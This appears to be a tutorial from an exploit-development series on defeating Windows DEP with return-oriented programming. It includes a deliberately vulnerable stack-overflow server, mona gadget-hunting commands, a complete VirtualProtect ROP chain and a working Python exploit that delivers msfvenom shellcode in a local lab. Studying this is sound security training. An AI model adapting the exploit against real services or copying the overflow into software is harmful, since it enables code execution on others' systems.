The first three tutorials in this series exploited binaries where the stack was executable. That era is over. Every modern Windows binary ships with DEP (Data Execution Prevention) enabled, which marks the stack and heap as non-executable. Shellcode placed on the stack will trigger an access violation instead of running.
The bypass is the same idea as on Linux: return-oriented programming. Instead of executing injected code, you chain together short instruction sequences (“gadgets”) that already exist in executable memory, typically in loaded DLLs, to call a Windows API function that makes your shellcode’s memory region executable. Then you jump to it.
On Windows, the two most common targets are VirtualProtect (change page permissions on existing memory) and VirtualAlloc (allocate a new executable region and copy shellcode into it). This tutorial uses VirtualProtect because the shellcode is already on the stack; you just need to flip the page from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.
Without DEP bypass:
Stack:
+--------+---------+------------+
| Junk | JMP ESP | Shellcode | → ACCESS VIOLATION (NX bit set)
+--------+---------+------------+
With ROP chain:
Stack:
+--------+-----------------------------+------------+
| Junk | ROP chain → VirtualProtect | Shellcode | → VirtualProtect makes
+--------+-----------------------------+------------+ stack executable, then
shellcode runsLab setup
Use the same Windows environment from previous tutorials:
- Windows 11 (32-bit or WoW64 process)
- Immunity Debugger with mona.py installed
- A vulnerable application compiled with DEP enabled and ASLR disabled
For a controlled target, compile a simple vulnerable server with DEP on and ASLR off:
// vuln_dep.c — compile with: cl /GS- vuln_dep.c /link /NXCOMPAT /DYNAMICBASE:NO ws2_32.lib
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
void handle_client(SOCKET client) {
char buf[512];
int len = recv(client, buf, 2048, 0); // overflow: 2048 into 512
printf("Received %d bytes\n", len);
}
int main() {
WSADATA wsa;
WSAStartup(MAKEWORD(2, 2), &wsa);
SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(9999);
addr.sin_addr.s_addr = INADDR_ANY;
bind(s, (struct sockaddr *)&addr, sizeof(addr));
listen(s, 5);
printf("Listening on port 9999...\n");
while (1) {
SOCKET client = accept(s, NULL, NULL);
handle_client(client);
closesocket(client);
}
}The /NXCOMPAT flag enables DEP. /DYNAMICBASE:NO disables ASLR so we can focus on the DEP bypass without address randomization (that’s the next tutorial).
Note
If you don’t have Visual Studio, use MinGW:
gcc -o vuln_dep.exe vuln_dep.c -lws2_32 -Wl,--nxcompat,--no-dynamicbase. Verify DEP is enabled by checking the PE header withdumpbin /headers vuln_dep.exeor inspecting in Immunity.
Confirming DEP is active
Attach Immunity Debugger to the running process. Before building the exploit, verify DEP status:
!mona modulesLook at the DEP column in the output. You can also check at the process level:
Debug → Select process → check "DEP" columnSend an initial overflow to confirm the crash:
#!/usr/bin/env python3
import socket
payload = b"A" * 524 + b"BBBB" + b"\xcc" * 200 # INT3 sled after EIP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()In Immunity, you’ll see EIP overwritten with 42424242, but if you replace BBBB with a JMP ESP address and place shellcode after it, execution hits a DEP violation:
Access violation when executing [0019FA6C] — NX page faultDEP is working. The stack is not executable.
Understanding VirtualProtect
VirtualProtect is the Windows API function that changes memory page permissions. Its signature:
BOOL VirtualProtect(
LPVOID lpAddress, // Address of the region to change
SIZE_T dwSize, // Size of the region in bytes
DWORD flNewProtect, // New protection flags (0x40 = PAGE_EXECUTE_READWRITE)
PDWORD lpflOldProtect // Pointer to receive the old protection value
);To bypass DEP, the ROP chain needs to:
- Set up the four arguments to
VirtualProtecton the stack or in registers - Call
VirtualProtectwithlpAddresspointing to the shellcode,dwSizelarge enough to cover it, andflNewProtect = 0x40 - After
VirtualProtectreturns, redirect execution to the now-executable shellcode
The lpflOldProtect parameter requires a writable address; any writable location in the process works (a global variable, a .data section address). VirtualProtect writes the old protection value there.
ROP chain layout on the stack:
ESP → +---------------------------+
| VirtualProtect address | ← function to call
+---------------------------+
| Return address (→shellcode)| ← where to go after VP returns
+---------------------------+
| lpAddress (ESP / shellcode)| ← arg 1: memory to make executable
+---------------------------+
| dwSize (0x400) | ← arg 2: size
+---------------------------+
| flNewProtect (0x40) | ← arg 3: PAGE_EXECUTE_READWRITE
+---------------------------+
| lpflOldProtect (writable) | ← arg 4: any writable address
+---------------------------+
| NOP sled + Shellcode |
+---------------------------+Finding gadgets with mona
Configure mona’s working directory:
!mona config -set workingfolder C:\mona\%pLocating VirtualProtect
!mona iat -s VirtualProtectThis searches the Import Address Table for VirtualProtect. The output shows the address of the IAT entry, which contains a pointer to the actual function.
0x12345678 kernel32.VirtualProtect (Module: vuln_dep.exe)Finding a non-ASLR module for gadgets
!mona modulesLook for modules with ASLR disabled (False in the ASLR column) and no bad characters in their base addresses. The vulnerable executable itself and any DLLs it loads without ASLR are candidates.
Module Base ASLR DEP SafeSEH
vuln_dep.exe 0x00400000 False True False
MSVCRT.dll 0x77C10000 False True FalseGenerating the ROP chain
Mona can automatically generate a ROP chain for common DEP bypasses:
!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d"This searches the specified modules for gadgets and attempts to construct a complete chain. The -cpb flag excludes bad characters. Mona generates several chain variants in rop_chains.txt and rop.txt.
!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -nThe -n flag skips modules with null bytes in their base address.
Review C:\mona\vuln_dep\rop_chains.txt. Mona produces Python-ready output:
# mona.py ROP chain for VirtualProtect (example output)
def create_rop_chain():
rop_gadgets = [
# rop chain generated by mona.py
0x77c31e24, # POP EAX # RETN [MSVCRT.dll]
0x77c11120, # ptr to &VirtualProtect() [IAT MSVCRT.dll]
0x77c31e70, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCRT.dll]
0x77c12df9, # XCHG EAX,ESI # RETN [MSVCRT.dll]
0x77c31e24, # POP EAX # RETN [MSVCRT.dll]
0xfffffdff, # Value to negate, will become 0x00000201 (513 bytes)
0x77c353c3, # NEG EAX # RETN [MSVCRT.dll]
0x77c12df8, # XCHG EAX,EBX # RETN [MSVCRT.dll] — dwSize
0x77c31e24, # POP EAX # RETN
0xffffffc0, # Value to negate, becomes 0x00000040
0x77c353c3, # NEG EAX # RETN — flNewProtect = PAGE_EXECUTE_READWRITE
0x77c12e01, # XCHG EAX,EDX # RETN [MSVCRT.dll]
0x77c34a10, # POP ECX # RETN [MSVCRT.dll]
0x77c5f030, # &Writable location [MSVCRT.dll .data] — lpflOldProtect
0x77c34a14, # POP EDI # RETN [MSVCRT.dll]
0x77c353c4, # RETN (ROP NOP) [MSVCRT.dll]
0x77c31e24, # POP EAX # RETN [MSVCRT.dll]
0x90909090, # NOP
0x77c12e08, # PUSHAD # RETN [MSVCRT.dll]
# PUSHAD pushes: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI
# This places all our prepared values onto the stack in the right
# order for VirtualProtect's stdcall convention
]
return b''.join(p.to_bytes(4, 'little') for p in rop_gadgets)How the chain works
The chain uses an indirect approach because directly placing arguments on the stack with null bytes would break the exploit. Instead:
- Load VirtualProtect address, POP the IAT pointer into EAX, dereference it to get the actual function address, move it into ESI
- Set dwSize, POP a negative value into EAX, negate it (avoids null bytes), move to EBX
- Set flNewProtect, Same trick: POP negative of 0x40, negate, move to EDX
- Set lpflOldProtect, POP a writable
.dataaddress into ECX - PUSHAD, Push all registers onto the stack in the order: EAX, ECX, EDX, EBX, ESP (lpAddress!), EBP, ESI (VirtualProtect), EDI (return ROP NOP). This constructs the VirtualProtect call frame automatically
The PUSHAD trick is elegant: by loading specific values into specific registers and then pushing them all at once, the stack ends up with VirtualProtect’s arguments in exactly the right positions for the stdcall calling convention.
After PUSHAD, the stack looks like:
ESP → +---------------------------+
| EDI = RETN gadget | ← VirtualProtect returns here
+---------------------------+
| ESI = &VirtualProtect | ← called via RETN
+---------------------------+
| EBP (don't care) |
+---------------------------+
| ESP = stack addr | ← lpAddress (points to shellcode below)
+---------------------------+
| EBX = 0x201 | ← dwSize
+---------------------------+
| EDX = 0x40 | ← flNewProtect
+---------------------------+
| ECX = writable addr | ← lpflOldProtect
+---------------------------+
| EAX = 0x90909090 | ← NOP sled (start of shellcode region)
+---------------------------+
| Shellcode continues... |
+---------------------------+Identifying bad characters
Follow the same process from previous tutorials:
!mona bytearray -b "\x00"
!mona compare -f C:\mona\vuln_dep\bytearray.bin -a <address>For a network service, typical bad characters include:
\x00 — null byte (string terminator)
\x0a — newline (protocol parsing)
\x0d — carriage return (protocol parsing)The negation trick in the ROP chain avoids null bytes in arguments like 0x00000040 (flNewProtect), instead we POP 0xffffffc0 and negate it.
Complete exploit
Generate a real payload first and save it next to the exploit as shellcode.py:
msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f python -v shellcode > shellcode.py#!/usr/bin/env python3
import socket
import struct
from shellcode import shellcode
pack = lambda x: struct.pack('<I', x)
# Bad chars: \x00\x0a\x0d
offset = 524 # bytes to EIP
# ROP chain — VirtualProtect via PUSHAD technique
# Addresses from mona output (adjust for your environment)
rop_chain = b""
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0x77c11120) # ptr to &VirtualProtect() [IAT]
rop_chain += pack(0x77c31e70) # MOV EAX,[EAX] # RETN — dereference IAT
rop_chain += pack(0x77c12df9) # XCHG EAX,ESI # RETN — ESI = VirtualProtect
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0xfffffdff) # -0x201 (will be negated to 0x201 = 513 bytes)
rop_chain += pack(0x77c353c3) # NEG EAX # RETN — EAX = 0x201
rop_chain += pack(0x77c12df8) # XCHG EAX,EBX # RETN — EBX = dwSize
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0xffffffc0) # -0x40 (will be negated to 0x40)
rop_chain += pack(0x77c353c3) # NEG EAX # RETN — EAX = 0x40
rop_chain += pack(0x77c12e01) # XCHG EAX,EDX # RETN — EDX = flNewProtect
rop_chain += pack(0x77c34a10) # POP ECX # RETN
rop_chain += pack(0x77c5f030) # writable .data address — lpflOldProtect
rop_chain += pack(0x77c34a14) # POP EDI # RETN
rop_chain += pack(0x77c353c4) # RETN (ROP NOP) — return address after VirtualProtect
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0x90909090) # NOP sled (will land in shellcode area)
rop_chain += pack(0x77c12e08) # PUSHAD # RETN — sets up VirtualProtect call frame
# NOP sled + shellcode
nop_sled = b"\x90" * 16
payload = b"A" * offset
payload += rop_chain
payload += nop_sled
payload += shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()Execution flow
1. Overflow buf[512] with 2048 bytes via recv()
2. EIP overwritten with first gadget address (POP EAX # RETN)
3. ROP chain executes:
a. Load VirtualProtect address from IAT → ESI
b. Set dwSize = 0x201 → EBX (via negate trick)
c. Set flNewProtect = 0x40 → EDX (via negate trick)
d. Set lpflOldProtect = writable .data addr → ECX
e. Set EAX = 0x90909090 (NOP for shellcode area)
f. PUSHAD constructs the call frame
4. RETN into ESI → VirtualProtect executes
- Changes stack page from RW to RWX
5. VirtualProtect returns to the RETN gadget (EDI)
- Which returns into the NOP sled on the (now executable) stack
6. Shellcode executesDebugging the ROP chain
When the chain doesn’t work on the first try (it usually doesn’t), systematic debugging in Immunity is essential.
Setting breakpoints on gadgets
Set a breakpoint on the first gadget in your chain:
bp 0x77c31e24Run the exploit. When it breaks, step through with F7 (step into) and verify each gadget does what you expect.
Watching register state
After each gadget executes, check that the target register holds the expected value. In the Registers window:
After POP EAX # RETN: EAX should contain the IAT pointer
After MOV EAX,[EAX]: EAX should contain &VirtualProtect
After XCHG EAX,ESI: ESI should contain &VirtualProtect
...Common failures
VirtualProtect returns 0 (failure). Check the arguments: lpAddress must be page-aligned or within the target page, dwSize must be > 0, and lpflOldProtect must point to a writable address. Use !mona find -s "\x00\x00\x00\x00" -type rw to find writable locations.
Chain crashes mid-execution. A gadget has a side effect you didn’t account for. Check if any gadget clobbers a register that a later gadget depends on. Step through each gadget and note all register changes, not just the intended one.
Shellcode still triggers DEP. VirtualProtect was called with the wrong lpAddress. The ESP value captured by PUSHAD might not point to your shellcode. Adjust the NOP sled size or add a stack adjustment gadget before the shellcode.
VirtualAlloc alternative
If VirtualProtect isn’t available or practical, VirtualAlloc allocates a new executable memory region:
LPVOID VirtualAlloc(
LPVOID lpAddress, // NULL (let the system choose)
SIZE_T dwSize, // Size of region
DWORD flAllocationType, // 0x1000 (MEM_COMMIT)
DWORD flProtect // 0x40 (PAGE_EXECUTE_READWRITE)
);The chain is slightly more complex because you need to copy shellcode from the stack into the newly allocated region. The typical approach:
- Call
VirtualAllocto get an RWX region - Use a
memcpygadget or a series ofMOV [reg], reggadgets to copy shellcode - Jump to the allocated region
Mona can generate this variant too:
!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -rvaWriteProcessMemory alternative
A third option is WriteProcessMemory, which copies data to any writable region, including .text sections of loaded modules (which are executable by default):
BOOL WriteProcessMemory(
HANDLE hProcess, // -1 (current process, pseudo-handle)
LPVOID lpBaseAddress, // destination in executable memory
LPCVOID lpBuffer, // source (shellcode on stack)
SIZE_T nSize, // size of shellcode
SIZE_T *lpNumberOfBytesWritten // output parameter
);This avoids changing page permissions entirely; you write shellcode over existing executable code.
Tips and troubleshooting
Gadget alignment
On Windows x86, the stdcall convention expects the callee to clean up the stack. If your ROP chain doesn’t account for this, the stack will be misaligned after the API call returns. The PUSHAD technique handles this automatically, but manual chains need careful stack management.
DEP opt-in vs opt-out
Windows DEP has two modes:
- OptIn, only protects processes that explicitly request it (default on client Windows)
- OptOut, protects all processes except those explicitly excluded (default on Server)
Check the system policy: bcdedit /enum | findstr nx. For testing, set OptOut to ensure DEP is active for your target.
Permanent DEP via SetProcessDEPPolicy
Some applications call SetProcessDEPPolicy(PROCESS_DEP_ENABLE | PROCESS_DEP_DISABLE_ATI_THUNK_EMULATION) to enable permanent DEP. This makes VirtualProtect fail for stack addresses on some configurations. In that case, use VirtualAlloc or WriteProcessMemory instead.
ROP chain size
The ROP chain for VirtualProtect with the PUSHAD technique is typically 76-100 bytes. Add the NOP sled and shellcode (~220 bytes for a reverse shell), and you need about 400 bytes of controllable stack space after EIP. If space is limited, consider a two-stage approach: use a minimal ROP chain to call VirtualProtect on a larger buffer elsewhere in memory where you’ve placed the full shellcode (similar to the egghunter concept from the previous tutorial).